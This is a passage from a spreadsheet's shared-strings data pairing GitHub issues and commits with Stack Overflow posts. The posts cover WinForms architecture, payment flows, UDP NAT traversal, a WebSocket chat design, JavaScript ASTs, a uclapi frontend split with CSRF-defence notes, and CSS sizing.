I've been asked to provide an MCVE. I've decided, time and energy required to fix this problem programatically doesn't worth it so I've simply added
if (image == null) image = new BufferedImage(300, 300, BufferedImage.TYPE_INT_RGB);
to get rid of the error. I will delete this line when I'm done working with this form.</t>
  </si>
  <si>
    <t xml:space="preserve">Consider a normal customer-orders application based on MVC pattern using WinForms.
The view part has grown too much (over 4000 files) and it needs to be split into smaller ones.
For this example we are going to use 3 projects for the view part:
Main - has dependencies to the other 2 projects. Instantiates the forms with the lists.
Customers - has 2 forms - customers list and customer details.
Orders - has 2 forms - orders list and order details.
On the customer details form there is also a list of orders for that customer. The list is received from the OrdersController so it's no problem getting it. When the user selects an order, the list will get it's guid and pass it as reference to the Order Details form.
This would mean that we need to have a reference to Orders Project in the Customers Project. (1)
But also on the order details form there is a link to the customer that made that order. When clicked, it should open the Customer Details form.
This would mean that we need to have a reference to Customers Project in the Orders Project. (2)
From (1) and (2) we'll have cyclic dependencies between the Orders and Customers projects.
How can this be avoided? Some kind of plug-in architecture? The project is already developed and the best solution would involve as little code change as possible.
</t>
  </si>
  <si>
    <t>C920</t>
  </si>
  <si>
    <t>order and payment creation order
The documentation provided here suggests order creation should be performed after payment is complete.
https://github.com/commercetools/commercetools-adyen-integration/blob/master/extension/docs/WebComponentsIntegrationGuide.md#web-components-integration-guide
Is there any particular reason you suggest that flow?
The common and I believe best practice is to create an order first and then update its status after the payment is complete.
@leungkinghin there are many reasons for the order to be created as a first thing.
We know the payment process is in its nature an asynchronous thing, right?
Consider following scenarios
the payment gateway had a delay in the payment processing,
there was an issue on the webhook side, and there was an error while handling notification about payment completion and the order couldn't be created.
In those scenarios, the customer is left alone, confused, without an error message, without an order, and still with a non-empty cart.
But if we place an order first, the customer will find that order in the orders tab, the order with the status 'awaiting payment'.
According to:
Otherwise we need to update/cancel the order after payment is authorized/rejected, which means extra traffic over the network is required.
Updating, canceling, or changing the state of the order is something natural for the Order model in the context of an e-commerce subdomain. Extra traffic over the network is not an argument at all.
I would reference that discussion here as well https://softwareengineering.stackexchange.com/questions/319658/do-you-create-an-order-before-or-after-payment-on-an-ecommerce-site
Any particular reason you suggest that flow</t>
  </si>
  <si>
    <t xml:space="preserve">Is there work on implementing a .NET version of the OSGi plugin architecture (or something similar)? I have only found [external-link] paper, but no real library. Any pointers?
</t>
  </si>
  <si>
    <t>C921</t>
  </si>
  <si>
    <t>still not able to receive udp message
https://stackoverflow.com/questions/33715497/android-can-send-udp-but-not-receive
https://stackoverflow.com/questions/17308729/send-broadcast-udp-but-not-receive-it-on-other-android-devices/25520279</t>
  </si>
  <si>
    <t>This is the NAT traversal problem as you have figured out.
Here's a few hints:
The server can be hardcoded to listen on port 2706. But it shouldn't make any assumptions about what source port of received packets are. From your code, it doesn't look like you ever attempt to call setPort. So even if the NAT wasn't mapping your port number differently, I'm not sure how your original code was even getting the any destination port set. But I think you figured this out based on your own answer and your updated code.
Don't hardcode a client port on the client's socket. Choose port "0" (or don't set one) on your socket to let the OS choose the first available port for you. If you have multiple clients behind the same NAT, this behavior will allow for quicker client restarts, multiple devices behind the same NAT, and other nice things.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to start my app, but I see empty page and follow message in console. This happens unexpectedly, I did change version of one dependency in my package.json and this problem appeared, after that I returned all changes back, but I still have this problem.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;Uncaught TypeError: _interop_require_wildcard._ is not a function at ./node_modules/next/dist/shared/lib/head.js (head.tsx:3:1) at options.factory (react refresh:6:1) at __webpack_require__ (bootstrap:22:1) at fn (hot module replacement:61:1) at ./node_modules/next/head.js (head.js:1:1) at options.factory (react refresh:6:1) at __webpack_require__ (bootstrap:22:1) at fn (hot module replacement:61:1) at ./src/pages/login/Login.tsx (LivestockKrs.tsx:41:1) at options.factory (react refresh:6:1)&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Let me know how to fix this, thank you! I'm newbie at this..&lt;/p&gt;
&lt;p&gt;I've tried to return package.json to its first view.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C922</t>
  </si>
  <si>
    <t>Sub tasks. Add websocket and stomp support to Spring and Angular (admin-portal and candidate-portal) #293
 Add new entities for Chat, Chat post
 Implement chat component on Angular
This facilitates communication between parties involved in a job: source partner, destination partner and candidates
It replicates what we currently do in Slack with job related channels (eg #emp-au-iress), job/candidate related channels (eg #emp-au-iress-atheer), and job/candidate cohort channels (eg #emp-uk-mersey-cohort3). Slack channels are replaced with "chats" associated with the following:
Destination partner on admin portal
Source Partner chat - they will have a separate chat with each source partner who is proposing candidates to them. They will see these chats under a new Chat tab on each job. There will be a sub tab for each source partner. (This is like the Slack job related channel, but it allows the destination partner to have separate chats with each source partner).
All Source Partners chat - Chat with all source partners proposing candidates to them. This chat will appear on the each job's Chat tab - in a sub tab called "All Partners".
Candidates chat - as above , but in addition candidates from a certain opportunity stage can also post - in a sub tab called "Candidates"
Associated with each candidate case on the TC they see:
Recruiting Candidate chat - source partner, destination partner and the individual candidate can communicate (like Slack job/candidate channel) - CV Review or later
Source partner on admin portal
Associated with each job that they are working on they see on the TC:
Destination partner chat - The same as the "Source Partner chat" above
Candidates chat and All Source Partners chat - as above
Associated with each candidate case that they are working on they see on the TC:
Prospect Candidate chat - source partner, individual candidate - early relationship prior to CV Review stage
Recruiting Candidate chat - as above for destination partner
Candidate on candidate portal
Associated with each job that the candidate is going for (has gone for) they see on the TC:
Prospect chat - The same as the "Prospective Candidate chat" above
Recruiting chat - The same as the "Recruiting Candidate chat" above
Group chat - The same as the "Candidates chat" above
Another possible chat
One more chat - source/candidate unassociated with any job. Trigger for creation is when source does first post. Email sent to candidate.
@camerojo
Collaborator
Author
camerojo commented on Jun 30, 2023 • 
Implementation
Note that there are:
two chats associated with each job opp.
one chat associated with each partner/job opp
two chats associated with each candidate opp.
In database terms:
two links in the Job entity: All partners chat, and candidates chat
one link in the PartnerJob entity: Source Partner chat (the source partner sees this renamed to "Destination parter chat" but it is the same chat)
two links to the candidate chats will be in the CandidateOpportunity entity: Candidate chat and Prospect chat
Websocket config
Endpoint /websocket (do we need to append it now?)
Application destination prefix "/app"
Destination prefix "/topic"
api/chat/ChatPublishAPI
@MessageMapping("/chat/{chatId}")
@sendto("/topic/chat/{chatId}")
public PublishedPost sendPost(Post post, @DestinationVariable chatId) {
//PublishedPost has some extra stuff added to incoming post - eg date
}
Chat implementation
app destination: We need every post to go to a Controller because that is where the post is persisted on the database.
JOIN/LEAVE: Some sample implementations which allow for users to identify and add themselves or remove themselves from a chat. We don't need this because we know the user posting from their logon.
MQ implementations: we don't need this because we are using our database to store chat posts. We just need the in memory.
Similar to ViewCandidateNote component
Need to add file upload capability - photos, docs - similar to what Slack can do. Docs either are associated with candidate or Job
On subscription, chat history retrieved from DB, then updates from messages.
API
ChatPublishAPI - WebSocket/STOMP controller handling incoming posts and multi casting out to subscribers
ChatAdminAPI - Normal RestController for creating, configuring, chats, handling uploads, post deletion etc
ChatService supports both the above
Angular
Two subscriptions for each chat associated with a user:
App globally subscribes to all updates to provide notifications of any posts
When a particular chat is on display, it adds a subscription to update the display while it is visible. Initially, historical chats are uploaded - then kept up to date based on subscription updates. Subscription closes when no longer displayed.
I believe that multiple subscriptions only need a single WebSocket connection.
DB
Job Chat - id (works as topic), definition includes type of chat, participants and associated job, case etc
Post - id (unique can be used to identify duplicates), timestamp (sort by timestamp), rich text, poster (user), job chat id
Access
TBB admins need special access - eg for training. Potential access on a job by job basis to other partners - eg IOM, UNHCR, Pathway Club
WebSockets and Stomp are the tech we need.
In the end, I created a Spring Server based on https://spring.io/guides/gs/messaging-stomp-websocket/ and an Angular client based on https://stomp-js.github.io/guide/rx-stomp/rx-stomp-with-angular.html
The main extra learnings to get it all going were in this post https://stackoverflow.com/questions/54578800/spring-boot-error-during-websocket-handshake
This works - on old versions of Spring as well.
However, extra complexity is added when Spring Security is added.
Then additional complexity associated with Token authentication.
Lastly, note that we calculate the token in a special login controller rather than in the filters.
Other links I looked at are below.
Spring
https://spring.io/guides/gs/messaging-stomp-websocket/
BUT see https://stackoverflow.com/questions/54578800/spring-boot-error-during-websocket-handshake for correct endpoint to send from client
https://www.baeldung.com/spring-websockets-sendtouser
https://stackoverflow.com/a/27055764/929968
SendTo variable topics
https://www.baeldung.com/websockets-spring
Angular
https://stomp-js.github.io/guide/rx-stomp/rx-stomp-with-angular.html
https://dimitri.codes/websockets-angular/
https://blog.briebug.com/blog/making-use-of-websockets-in-angular - bit that rxjs includes websocket client
https://stackoverflow.com/questions/67896050/how-to-make-a-simple-rxjs-websocket-service-in-angular-12</t>
  </si>
  <si>
    <t>Try new WebSocket("ws://localhost:8080/Moda/chatroomServerEndpoint/websocket"); instead of `new WebSocket("ws://localhost:8080/Moda/chatroomServerEndpoint");`
Also make sure to set .setAllowedOrigins("*")</t>
  </si>
  <si>
    <t xml:space="preserve">What are some of the more common design patterns used when developing 3D games? Are there any high-level architectural design patterns that are commonly used? What about general software patterns within the architecture?
</t>
  </si>
  <si>
    <t>C923</t>
  </si>
  <si>
    <t>What is the problem this feature will solve?
Has the Access AST of the javascript module proposal been accepted into tc9 and node.js? Can someone take lead and help raise an proposal for this?
Can you make the AST available as read-only to developers in browsers [rethink security concerns] and js server environments if not on browers? Seems like the mozilla docs Parser_API documentation is somehow removed and I am still wondering how to access the file's parsed, even if read-only, AST
Access AST: Proposal status: Access AST of the javascript module #45158
Use Cases of AST like JS Parsers: access the import cache imported packages cache like require.cache #45207
https://stackoverflow.com/questions/16127985/what-is-javascript-ast-how-to-play-with-it
I wish to strongly vote for it, if this is in consideration. I recommend the access using a separate nodejs module api, if requested for my view. pls consider security and runtime risks based on your immense experience with such an nodejs module api access without a commandline's force access ast option enabled or other secure alternatives.
What is the feature you are proposing to solve the problem?
Access AST of the javascript module in runtime engines if not on browsers.
What alternatives have you considered?
Using a bundler parser like ESTree, Typescript, and Babel. https://stackoverflow.com/questions/16127985/what-is-javascript-ast-how-to-play-with-it
Use Cases of AST like JS Parsers: access the import cache imported packages cache like require.cache #45207
One of many JS Parsers [Use Cases]: Upgrade to latest version of ECMAScript 2021/ 2022 dop251/goja#498
JS Parsers in the market [Use Cases]: https://github.com/fkling/astexplorer
https://stackoverflow.com/questions/16127985/what-is-javascript-ast-how-to-play-with-it</t>
  </si>
  <si>
    <t xml:space="preserve">1.You can take a look at AST explorer. An online tool to explore the ASTs generated by more than 10 parsers. It is a good tool to learn AST tree of a language.AST explorer source at Github.com.
2.Also you can paste your js code into JavaScript AST visualizer and click "show ast" button, you will see the AST visully.
demo js code:
function foo(d) {
  d += 3;
    return d+999
}
function bar(d) {
    return d*100
}
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to add an animation in ID &amp;quot;Rangasala&amp;quot;. I want the &amp;quot;Rangasala&amp;quot; ID to show &amp;quot;Itahari Rangasala Karate Dojo&amp;quot; on fading appear animation but it is not working.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Screenshot:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/F0p18GyV.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/F0p18GyV.png" alt="Screenshot" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Code:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;div class="snippet" data-lang="js" data-hide="false" data-console="true" data-babel="false" data-babel-preset-react="false" data-babel-preset-ts="false"&gt;_x000D_
&lt;div class="snippet-code"&gt;_x000D_
&lt;pre class="snippet-code-js lang-js prettyprint-override"&gt;&lt;code&gt;// Background image slider
const showcase = document.getElementById("showcase");
const images = [
  "https://placehold.co/600x400/pink/lightgray/?text=Dojo2.jpg",
  "https://placehold.co/600x400/aliceblue/lightgray/?text=Dojo1.jpg",
  "https://placehold.co/600x400/lightyellow/lightgray/?text=Dojo3.jpg"
];
let index = 0;
function changeBackground() {
  showcase.style.backgroundImage = `url('${images[index]}')`;
  // Apply clip-path and center only for Dojo3.jpg
  if (images[index].includes("Dojo3.jpg")) {
    showcase.style.clipPath = "inset(10% 0 0 0)";
    showcase.style.backgroundPosition = "center";
  } else {
    showcase.style.clipPath = "none";
    showcase.style.backgroundPosition = "center";
  }
  index = (index + 1) % images.length; // Loop through images
}
// Set initial background and start changing every 3 seconds
changeBackground();
setInterval(changeBackground, 3000);
// Typed.js initialization
var typed = new Typed('#Rangasala', {
  strings: ['Itahari Rangasala Karate Dojo'],
  typeSpeed: 50,
  backSpeed: 25,
  loop: true,
  startDelay: 1000,
  backDelay: 1500,
  onComplete: () =&amp;gt; {
    // Add animation class after Typed.js completes
    const rangasalaElement = document.getElementById("Rangasala");
    rangasalaElement.classList.add("fadeIn");
  }
});
// Blur effect
const bg = document.querySelector('.bg');
let load = 0;
let int = setInterval(blurring, 30);
function blurring() {
  load++;
  if (load &amp;gt; 99) {
    clearInterval(int);
  }
  bg.style.filter = `blur(${scale(load, 0, 100, 30, 0)}px)`;
}
// Utility function for scaling
function scale(num, in_min, in_max, out_min, out_max) {
  return ((num - in_min) * (out_max - out_min)) / (in_max - in_min) + out_min;
}&lt;/code&gt;&lt;/pre&gt;_x000D_
&lt;pre class="snippet-code-css lang-css prettyprint-override"&gt;&lt;code&gt;body {
  font-family: sans-serif;
}
@keyframes fadeIn {
  from {
    opacity: 0;
    transform: translateY(-20px);
  }
  to {
    opacity: 1;
    transform: translateY(0);
  }
}
.fadeIn {
  animation: fadeIn 2s ease-in-out forwards;
}&lt;/code&gt;&lt;/pre&gt;_x000D_
&lt;pre class="snippet-code-html lang-html prettyprint-override"&gt;&lt;code&gt;&amp;lt;section id="showcase"&amp;gt;
  &amp;lt;div class="container"&amp;gt;
    &amp;lt;div class="bg"&amp;gt;
      &amp;lt;h1 id="Rangasala"&amp;gt;&amp;lt;/h1&amp;gt;
      &amp;lt;p&amp;gt;Welcome to the Website of the Itahari Rangasala Karate Dojo&amp;lt;/p&amp;gt;
    &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
&amp;lt;/section&amp;gt;
&amp;lt;script src="https://cdnjs.cloudflare.com/ajax/libs/typed.js/2.0.10/typed.min.js"&amp;gt;&amp;lt;/script&amp;gt;&lt;/code&gt;&lt;/pre&gt;_x000D_
&lt;/div&gt;_x000D_
&lt;/div&gt;_x000D_
&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C924</t>
  </si>
  <si>
    <t xml:space="preserve">Skip to content
Navigation Menu
uclapi
uclapi
Type / to search
Code
Issues
36
Pull requests
39
Discussions
Actions
Projects
Wiki
Security
Insights
Commit d4c7020
Preview
Give feedback
shu8
shu8
authored
on Jun 12, 2023
Verified
Split frontend and backend (#4095)
* Begin separating frontend from backend
Creates an initial Next.js app with all the existing files from the
frontend moved over and initial integration issues fixed.
* Add authentication using UCL API Oauth
* Add blog posts via ISR
* Update Dashboard API to extract JWT UPI
This is instead of the Django session, because the frontend will be
completely separate from Django now.
* Fix JWE decryption logic &amp; proxy Next.js frontend in dev
* Make dashboard endpoints Django CSRF exempt
We are validating the JWT requests and NextAuth.js has CSRF validation
built-in.
* Fix dashboard styles
* Fix settings endpoints for new frontend
* Delete unused Django paths/views; Fix dashboard/catch-all routes
* Move permission/authorisation page to a Django template
In this case, the page is completely separate to the normal frontend, so
it is okay to keep it within Django, as it would be much more complex if
we tried to extract this out too.
* Fix build errors
* Move AUP acceptance to create-app stage
We can't do it at the dashboard login stage anymore because we are using
the standard OAuth flow, so can't restrict login based on something like
this.
We could move the entire AUP acceptance responsibility to this Next.js
frontend app, but adding an entire database just for that, and
fragmenting our data doesn't seem like a great option.
So now, when a user tries to create an app, the endpoint will return an
error, prompting the frontend to show the AUP, request the user to
accept it, and send the acceptance to a new endpoint.
Then, the user can continue making their app.
* Fix session user cn extraction logic
* Cleanup stale code
* Fix settings endpoints session user cn extraction logic
* Minor style fixes
* Add missing component
* Delete old frontend
* Update dashboard AUP tests
* Require dashboard APIs to be POST and application/json
We are using SameSite=Lax cookies for the NextAuth.js JWT cookie, which
prevents most types of CSRF attacks.
In the case where a &lt;form method=post&gt; is used on a malicious site, this
cannot be of type 'application/json', so we can protect against such
attacks by ensuring the API is explicitly called with this content type.
Finally, we have disabled CORS on all endpoints, so JS-initiated attacks
also should not work.
SameSite=lax should prevent cross-origin opaque (`no-cors` mode)
requests (where no response is sent) to not be an issue, because the
cookie will not be sent.
As of today, SameSite=Lax support is 95.62% globally
(https://caniuse.com/?search=SameSite).
Useful reading:
- https://michaelzanggl.com/articles/web-security-cors-csrf-samesite/
- https://stackoverflow.com/a/11024387
- https://stackoverflow.com/a/62450640
* Update frontend to make application/json POST requests
* Update dashboard tests for JWT cookie auth extraction &amp; JSON POSTs
* Lint python code
* Temporarily disable Hound for frontend
The frontend will need a larger refactor, after the separation is
finished and confirmed to be working fine.
* Fix oauth tests
* Fix tests
* Update deployment config for new frontend
This is just for staging, for now.
* Fix tests
* Fix frontend paths
* Fix import
* Install pnpm in CI
* Fix tests
* Lint Python code
* Fix docs rendering with openapi-explorer instead of swagger-ui-react
This library seems to have a bit better UX.
* Add temp token endpoint for homepage demo
master(#4095)
·
1.4.12
1.4.0
1 parent 
93c4227
 commit 
d4c7020
File tree
Filter files
.github/workflows
create-version.yml
workflow.yml
.hound.yml
backend/uclapi
dashboard
api_applications.py
app_helpers.py
tests.py
urls.py
views.py
webhook_views.py
oauth
templates
permissions.html
tests.py
views.py
requirements.txt
uclapi
settings.py
urls.py
docker/deployment
docker-compose-staging.yml
uclapi-web.Dockerfile
frontend
.eslintignore
.eslintrc.hound.json
.eslintrc.json
.gitignore
.stylelintrc.yml
README.md
babel.config.js
package-lock.json
src
components/layout
Demo.jsx
pages
404
index.jsx
500
index.jsx
AboutPage
index.jsx
AppSettings
index.jsx
Authorise
Authorise.jsx
Authorise.scss
index.jsx
Dashboard
Dashboard.scss
index.jsx
Documentation
Documentation.jsx
index.jsx
Home
index.jsx
Marketplace
index.jsx
Warning
index.jsx
test
Snapshots.test.js
__mocks__
fileMock.js
styleMock.js
__snapshots__
Snapshots.test.js.snap
webpack.dev.js
webpack.prod.js
uclapi-frontend
.eslintrc.json
.gitignore
Dockerfile
README.md
components
AppPage.jsx
appsettings
LogInLayout.jsx
SettingsLayout.jsx
dashboard
AcceptableUsePolicy.jsx
AccordionIcon.jsx
AccordionIcon.module.scss
App.jsx
navbar.jsx
layout
Demo.jsx
Footer.jsx
Icons.jsx
Items.jsx
Link.jsx
NavBar.jsx
Warning.jsx
containers
Column.jsx
Container.jsx
Row.jsx
data
RequestGenerator.jsx
app_pages.jsx
dashboard_styles.jsx
homepage_constants.jsx
room_names.jsx
team_members.jsx
views
AnalyticInfo
AnalyticInfo.jsx
AnalyticInfo.module.scss
AnalyticUserInfo.jsx
AutoCompleteView.jsx
Button
Button.jsx
Button.module.scss
index.js
CardView.jsx
CheckBox
CheckBox.jsx
CheckBox.module.scss
index.js
Code
Code.jsx
index.js
ConfirmBox.jsx
Field
Field.jsx
Field.module.scss
index.js
Icon.jsx
ImageView.jsx
TextView.jsx
lib
Api
DashboardApi.js
SettingsApi.js
index.js
Constants.js
ErrorReporting.jsx
withSession.jsx
middleware.ts
next.config.js
package.json
pages
404.jsx
500.jsx
_app.tsx
_document.tsx
about.jsx
api/auth
[...nextauth].ts
dashboard.jsx
docs.jsx
index.jsx
marketplace
[app].tsx
index.jsx
settings.jsx
warning.jsx
pnpm-lock.yaml
public
dashboard
checked.svg
copy.svg
edit.svg
refresh.svg
save.svg
trash.svg
unchecked.svg
documentation
chevron-down.svg
chevron-up.svg
favicon.ico
home-page
balloons.jpg
docs.svg
facebook.png
github.jpg
github.png
github.svg
heart.svg
instagram.png
linkedin.png
logo.svg
market.svg
splash_screen.png
star.svg
twitter.png
uclassistantmarket.png
legacy-designs
logoCover.png
logoCover2_original.png
logoCover_original.png
marketplace.png
marketplace
arrow-left.svg
market.svg
roombuddy
logo.png
screenshot_1.png
screenshot_2.png
screenshot_3.png
uclassistant
logo.png
screenshot_1.png
screenshot_2.png
screenshot_3.png
uclcssa
logodark.png
logolight.png
screenshot_1.png
screenshot_2.png
screenshot_3.png
screenshot_4.png
unikomet
desktop_screenshot_1.png
desktop_screenshot_2.png
desktop_screenshot_3.png
desktop_screenshot_4.png
logo.png
screenshot_1.png
screenshot_2.png
screenshot_3.png
navbar
about.svg
dashboard.svg
docs.svg
home.svg
market.svg
menu.svg
settings.svg
next.svg
signInWithUCLAPI.png
signInWithUCLAPI_original.png
simpleAPILogoBlack.png
simpleAPILogoBlack.svg
simpleAPILogoWhite.svg
team
alex.jpg
anirudh.jpeg
anush.jpg
chris.jpeg
ethan.jpeg
faiz.jpeg
harry.jpg
henry.jpeg
huey.jpg
jaro.jpeg
kimia.jpg
teambg.jpg
wilhelm.jpg
zak.jpg
uclapi.openapi.json
vercel.svg
warning
warning.svg
styles
Dashboard.module.scss
Home.module.scss
Marketplace.module.scss
sass
agreement.scss
common
uclapi.scss
core.scss
documentation.scss
helpers.scss
hub.scss
navbar.scss
tsconfig.json
uclapi.openapi.json
Some content is hidden
Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.
212 files changed
+19378
-31314
lines changed
Search within code
Customizable line height
The default line height has been increased for improved accessibility. You can choose to enable a more compact line height from the view settings menu.
‎.github/workflows/create-version.yml
+3
-4
Original file line number	Diff line number	Diff line change
@@ -7,7 +7,7 @@ on:
        description: 'Version number'
        required: true
        default: '1.0.0'
jobs:
  version:
    name: Update version number
@@ -22,9 +22,9 @@ jobs:
        run: |
          sudo apt-get install jq -y
          echo -n $UCLAPI_VERSION &gt; version
          jq ".version=\"$UCLAPI_VERSION\"" ./frontend/package.json &gt; /tmp/package.json
          jq ".version=\"$UCLAPI_VERSION\"" ./uclapi-frontend/package.json &gt; /tmp/package.json
          jq ".info.version=\"$UCLAPI_VERSION\"" ./uclapi.openapi.json &gt; /tmp/uclapi.openapi.json
          mv /tmp/package.json ./frontend/package.json
          mv /tmp/package.json ./uclapi-frontend/package.json
          mv /tmp/uclapi.openapi.json ./uclapi.openapi.json
      - name: Create commits
@@ -43,4 +43,3 @@ jobs:
          title: "Release v${{ github.event.inputs.version }}"
          delete-branch: true
          branch: "releases/${{ github.event.inputs.version }}"
‎.github/workflows/workflow.yml
+44
-87
Original file line number	Diff line number	Diff line change
@@ -22,21 +22,32 @@ jobs:
      - name: Setup NodeJS
        uses: actions/setup-node@v2
        with:
          node-version: '14'
          node-version: '18'
      - name: Cache NodeJS
        uses: actions/cache@v2
      - name: Install pnpm
        uses: pnpm/action-setup@v2
        id: pnpm-install
        with:
          path: ~/.npm
          key: ${{ runner.os }}-node-${{ hashFiles('**/package-lock.json') }}
          version: 7
          run_install: false
      - name: Get pnpm store directory
        id: pnpm-cache
        shell: bash
        run: |
          echo "STORE_PATH=$(pnpm store path)" &gt;&gt; $GITHUB_OUTPUT
      - uses: actions/cache@v3
        name: Setup pnpm cache
        with:
          path: ${{ steps.pnpm-cache.outputs.STORE_PATH }}
          key: ${{ runner.os }}-pnpm-store-${{ hashFiles('**/pnpm-lock.yaml') }}
          restore-keys: |
            ${{ runner.os }}-node-
            ${{ runner.os }}-pnpm-store-
      - name: Install frontend dependencies
        run: |
          cp ./backend/uclapi/webpack-stats.sample.json ./backend/uclapi/static/webpack-stats.json &amp;&amp; \
          cd ./frontend/ &amp;&amp; \
          npm ci
          cd ./uclapi-frontend &amp;&amp; pnpm install --frozen-lockfile
      - name: Get version
        id: version
@@ -49,27 +60,17 @@ jobs:
          UCLAPI_VERSION: "${{ steps.version.outputs.content }}-${{ github.sha }}"
        run: |
          sudo apt-get install jq -y
          jq ".version=\"$UCLAPI_VERSION\"" ./frontend/package.json &gt; /tmp/package.json
          jq ".version=\"$UCLAPI_VERSION\"" ./uclapi-frontend/package.json &gt; /tmp/package.json
          jq ".info.version=\"$UCLAPI_VERSION\"" ./uclapi.openapi.json &gt; /tmp/uclapi.openapi.json
          mv /tmp/package.json ./frontend/package.json
          mv /tmp/package.json ./uclapi-frontend/package.json
          mv /tmp/uclapi.openapi.json ./uclapi.openapi.json
      - name: Build frontend
        env:
          AWS_S3_BUCKET_NAME: uclapi-static-staging
          AWS_S3_BUCKET_PATH: static/
          AWS_S3_STATICS: True
          SENTRY_DSN_REACT: ${{ secrets.SENTRY_DSN_REACT }}
          SENTRY_DSN_ENV: staging
        run: |
          cd ./frontend &amp;&amp; \
          npm run build
      - name: Upload frontend
        uses: actions/upload-artifact@master
        with:
          name: frontend-build
          path: ./backend/uclapi/static
          cd ./uclapi-frontend &amp;&amp; pnpm build
  test-backend:
    name: Run backend tests
@@ -163,86 +164,43 @@ jobs:
      - name: Setup NodeJS
        uses: actions/setup-node@v2
        with:
          node-version: '14'
          node-version: '18'
      - name: Cache NodeJS
        uses: actions/cache@v2
      - name: Install pnpm
        uses: pnpm/action-setup@v2
        id: pnpm-install
        with:
          version: 7
          run_install: false
      - name: Get pnpm store directory
        id: pnpm-cache
        shell: bash
        run: |
          echo "STORE_PATH=$(pnpm store path)" &gt;&gt; $GITHUB_OUTPUT
      - uses: actions/cache@v3
        name: Setup pnpm cache
        with:
          path: ~/.npm
          key: ${{ runner.os }}-node-${{ hashFiles('**/package-lock.json') }}
          path: ${{ steps.pnpm-cache.outputs.STORE_PATH }}
          key: ${{ runner.os }}-pnpm-store-${{ hashFiles('**/pnpm-lock.yaml') }}
          restore-keys: |
            ${{ runner.os }}-node-
            ${{ runner.os }}-pnpm-store-
      - name: Install frontend dependencies
        run: |
          cp ./backend/uclapi/webpack-stats.sample.json ./backend/uclapi/static/webpack-stats.json &amp;&amp; \
          cd ./frontend/ &amp;&amp; \
          npm ci
          cd ./uclapi-frontend/ &amp;&amp; pnpm install --frozen-lockfile
      - name: Run frontend tests
        run: |
          cd ./frontend &amp;&amp; \
          npm test
          cd ./uclapi-frontend &amp;&amp; pnpm test
      # TODO: add coverage to frontend
      # - name: Upload coverage to Codecov
      #   uses: codecov/codecov-action@v1.5.2
      #   with:
      #     fail_ci_if_error: true
  collect-statics:
    name: Collect statics
    needs:
      - build
      - test-backend
      - test-frontend
    runs-on: ubuntu-latest
    if: github.ref == 'refs/heads/master'
    environment: Staging
    steps:
      - name: Checkout code
        uses: actions/checkout@v2
      - name: Setup Python
        uses: actions/setup-python@v2
        with:
          python-version: '3.7'
      - name: Cache Python
        uses: actions/cache@v2
        with:
          path: ~/.cache/pip
          key: ${{ runner.os }}-pip-${{ hashFiles('**/requirements.txt') }}
          restore-keys: |
            ${{ runner.os }}-pip-
      - name: Install Python dependencies
        run: |
          python -m pip install --upgrade pip &amp;&amp; \
          cd ./backend/uclapi &amp;&amp; \
          pip install -r requirements.txt
      - name: Download frontend
        uses: actions/download-artifact@v2
        with:
          name: frontend-build
          path: ./backend/uclapi/static
      - name: Collect statics to S3
        env:
          AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
          AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
          AWS_S3_BUCKET_NAME: uclapi-static-staging
          AWS_S3_BUCKET_PATH: static/
          AWS_S3_REGION: eu-west-2
          AWS_S3_STATICS_CREDENTIALS_ENABLED: True
          AWS_S3_STATICS: True
          UCLAPI_PRODUCTION: True
          UCLAPI_RUNNING_ON_AWS_ELB: False
        run: |
          cd ./backend/uclapi &amp;&amp; \
          ./manage.py collectstatic --noinput
  build-containers:
    name: Build containers
    needs:
@@ -316,7 +274,6 @@ jobs:
  deploy:
    name: Deploy
    needs:
      - collect-statics
      - build-containers
    runs-on: ubuntu-latest
    environment: Staging
0 commit comments
Comments
0
 (0)
Comment
You're not receiving notifications from this thread.
</t>
  </si>
  <si>
    <t>Forging arbitrary CSRF requests with arbitrary media types is effectively only possible with XHR, because a form’s method is limited to GET and POST and a form’s POST message body is also limited to the three formats application/x-www-form-urlencoded, multipart/form-data, and text/plain. However, with the form data encoding text/plain it is still possible to forge requests containing valid JSON data.
So the only threat comes from XHR-based CSRF attacks. And those will only be successful if they are from the same origin, so basically from your own site somehow (e. g. XSS). Be careful not to mistake disabling CORS (i.e. not setting Access-Control-Allow-Origin: *) as a protection. CORS simply prevents clients from reading the response. The whole request is still sent and processed by the server.</t>
  </si>
  <si>
    <t xml:space="preserve">I am working on creating a API (using WCF) that will expose some of the internal systems of an ecommerce company to the outside world.
The target users of the API are mostly small businesses who may not have extensive develper resources. 
To ensure the evolution of the API in the future, i have decided that the input and output parameters of the API would be strings (xml doucment converted to string).
This got me thinking of all the possible ways that once after receiving the strings into my methods and generating xml documents from them, how would i go about mapping this xml document to strongly typed objects that i have access to - these objects are used in the internal system that my api exposes.
What are the best practices in getting a xml document converted into strongly typed classes (keep in mind though, that i cannot directly convert the xml into objects as in some cases, i would have to add additional information in the api to build the objects that are needed by internal systems)
</t>
  </si>
  <si>
    <t>C925</t>
  </si>
  <si>
    <t>[web] Make Input component box-sizing: border-box;
Summary: Noticed width of `Input` in `LoginForm` was behaving weirdly. Found this: https://stackoverflow.com/a/628912, and it seems like `box-sizing: border-box` is what we want for the `Input` component.
Test Plan: `Input` looks right in the context of `LoginForm`. I will look at other instances of `Input` in `web` to make sure that things continue to look as expected before landing.
Reviewers: def-au1t, palys-swm, varun, benschac, ashoat
Reviewed By: benschac, ashoat</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What you could do is to remove the default "extras" on the &lt;code&gt;input&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;input.wide {display:block; width:100%;padding:0;border-width:0}
&lt;/code&gt;&lt;/pre&gt;
